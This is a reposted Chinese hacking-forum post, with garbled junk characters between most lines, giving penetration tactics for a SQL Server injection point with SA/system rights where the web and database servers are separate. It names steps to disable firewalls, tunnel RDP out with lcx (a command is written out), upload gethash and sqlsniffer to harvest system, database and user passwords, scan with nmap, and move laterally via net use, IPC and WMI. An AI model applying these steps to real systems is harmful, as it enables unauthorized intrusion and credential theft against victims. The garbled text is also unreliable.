当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
( N$ O* n( \5 D* u8 _+ ~, ]
j8 ]# X H+ B4 t* Z# V1 n* t
% H0 C; S- B% W9 x/ ?' \, M% O8 J) R, j( A# k% y
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
3 A+ O% i p \$ }6 T0 P- R! L2 a1 U4 y0 P9 P, R, h" \$ d
( U& t/ J$ \* c" S# I3 P& A一、DB机有公网IP.* N% Q; T% g' Y5 r* p
' L7 ~3 M$ h8 ?* ^( Z( h4 G; p. x
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.# ~- [- l! l7 A p7 \
7 G, | L/ u; }& C0 X- |( m
/ n6 t" X$ J* [2 O2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389./ x. ^5 r1 I" }* E7 ?
1 F* w0 @' r+ q4 r
" G* m L' {/ }1 w# ~0 B: O0 S3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com$ }( t' x2 Z, h1 y% V2 r
4 R0 y- u. D ?
' L7 Y5 ~. W* n9 O4 k* y4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用./ v' V5 D/ J, V; h$ ?
! ?: Y& E- }- Z2 g. \
7 W2 ?9 R1 j) a- S. E5 U3 s' K i, o* E1 |
二、DB机只有内网IP3 u! }# q; v; `5 s2 K
! g2 v: x0 k1 y1 j1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
: I+ l4 R6 ]! g- v5 T: \0 D( H# t+ @
1 d* o2 `5 _: V. U! y
2:停掉防火墙和IP策略再从内往外扫描.' a# L. Z* c- `
! l7 W7 u; c: ~+ }, M2 p+ m6 y$ w1 z
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
& @5 ^/ o. \ }' j% G1 Z) t: y& F$ g; F9 T8 v0 Z
) {% c7 h' A3 U4:学会密码规律分析往往会有惊喜.7 H" X0 i7 W* `' f) ]; X) }0 u: L
3 z" n) c: }( Q0 Q
6 V4 {$ h; |$ F& S* I
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
4 i, i2 T# C5 h6 t7 X% K' z) l+ e( A x
2 D' w4 c: \, t) `# [ m4 j
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |